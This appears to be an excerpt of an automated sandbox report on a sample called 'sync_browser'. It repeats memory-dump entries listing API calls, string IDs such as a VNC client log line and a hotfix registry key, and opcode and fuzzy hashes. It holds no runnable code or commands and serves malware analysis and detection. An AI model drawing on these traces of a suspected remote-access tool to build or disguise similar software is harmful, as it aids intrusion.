                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$MappingOpenView
                                                    • String ID: {34F673E0-878F-11D5-B98A-57B0D07B8C7C}
                                                    • API String ID: 3439327939-2897898322
                                                    • Opcode ID: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
                                                    • Instruction ID: e6a49667b5dd0443c2df61c9eb8fd2c19fcea8be42e8a9f9a49e57d283e9cdac
                                                    • Opcode Fuzzy Hash: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
                                                    • Instruction Fuzzy Hash: 5C018E32518B9087E720DBA4E45066EB7A0FB88BA4FC50336DA9A07B98CF7CD050C710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$MappingOpenView
                                                    • String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                                                    • API String ID: 3439327939-3305976270
                                                    • Opcode ID: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                    • Instruction ID: 780d4a159ff2d0c42af42053f91ac5c735a03eb239297c752e66d96fb66b3124
                                                    • Opcode Fuzzy Hash: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                    • Instruction Fuzzy Hash: 2C018B32509B94C6E720DB64E45166EF7A0FB84BA4FC94236DAAA03B98CF7CD450C760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressFreeLibraryProc
                                                    • String ID: DllGetVersion
                                                    • API String ID: 3013587201-2861820592
                                                    • Opcode ID: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
                                                    • Instruction ID: f2d8682bf0ef9f14839f1e066e1268958b4109081c2a113350d34c29c5a63a42
                                                    • Opcode Fuzzy Hash: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
                                                    • Instruction Fuzzy Hash: 92011E2261C75187E7149B55B48003EB6A0FF88B98F84413AEA9E46B58DF7CD5548B20
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ClassMessageNamePost
                                                    • String ID: WindowsScreenSaverClass
                                                    • API String ID: 650004062-352026012
                                                    • Opcode ID: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
                                                    • Instruction ID: a5976b96fe95337ed4ad12fc61bec6d599529618c3b7a24580a39a54626bf8e7
                                                    • Opcode Fuzzy Hash: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
                                                    • Instruction Fuzzy Hash: 79012C31618A9582E771AB15F910BEAA390FB8CB84FC40132DE8C1BB58DE3CE1558B10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateErrorFileLastMapping
                                                    • String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                                                    • API String ID: 1790465270-3305976270
                                                    • Opcode ID: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
                                                    • Instruction ID: bdb66565c4080ceaf468d34028f5ce47f9f90b941ae13508a519cbec32f2b78a
                                                    • Opcode Fuzzy Hash: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
                                                    • Instruction Fuzzy Hash: 8D0171225097C1C6E7608B28A41076AB7A0EB84778F948335EABA026E8DF7CC494C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessageObjectSendSingleWait
                                                    • String ID: vncclient.cpp : client Kill() called
                                                    • API String ID: 353115698-1198714380
                                                    • Opcode ID: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                    • Instruction ID: 29c1ab2fd109e5d30fe1653cefe6b91fb5784df9bbcbbf99290984bcd843f5e3
                                                    • Opcode Fuzzy Hash: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                    • Instruction Fuzzy Hash: FB017C3260498182EB58AF75E8457ADA761EF88F78FD84232CA3D076D9CF38D494C390
                                                    APIs
                                                    Strings
                                                    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009, xrefs: 00007FF7D593678B
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseOpen
                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
                                                    • API String ID: 47109696-713323490
                                                    • Opcode ID: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
                                                    • Instruction ID: 1b7468fd0699a15d3085d8f9ee140c7896c6cf292f178da9efae86a512bb5ae4
                                                    • Opcode Fuzzy Hash: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
                                                    • Instruction Fuzzy Hash: 54F0C821A1874182EB109B24E40465EE7B0FF95F98FD80036DE5D077A4DF79C084C714
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: getpeernameinet_ntoa
                                                    • String ID: <unavailable>
                                                    • API String ID: 1982201544-1096956887
                                                    • Opcode ID: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
                                                    • Instruction ID: a683c0b7f244e2cb9d48a99c04c5d555355ff78dc4a82b7392530e82bc7bde72
                                                    • Opcode Fuzzy Hash: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
                                                    • Instruction Fuzzy Hash: A1F01271A187818BEA64AB10E85116DB760FFC8B98FC01436E94D17724DF3CD106CB10
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$ErrorFreeHeapLast_errnomalloc
                                                    • String ID:
                                                    • API String ID: 1225357528-0
                                                    • Opcode ID: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
                                                    • Instruction ID: 39a5b80d30b31ce7259457ebe149c5aab999d5212184af6fc5832fe17278ab20
                                                    • Opcode Fuzzy Hash: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
                                                    • Instruction Fuzzy Hash: 2D111A11F1C18243EA54B766A75137E9251AF84FC8FC85032EE9E4BB8BDF2CD4828764
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseErrorHandleLast
                                                    • String ID:
                                                    • API String ID: 918212764-0
                                                    • Opcode ID: 29aa8eabd37ce073336345db576575990ec91cb532e4ac08565d8b170ae5ab50
                                                    • Instruction ID: 1094eaa0f00a6b17c9b0c261708e9e3ac6b67994d0743934e860c592f281380c
                                                    • Opcode Fuzzy Hash: 29aa8eabd37ce073336345db576575990ec91cb532e4ac08565d8b170ae5ab50
                                                    • Instruction Fuzzy Hash: DD210632A19A5A87EB54AF65D48067DA3A4FF84F48FD40036EE4E436A8DF3CD445C760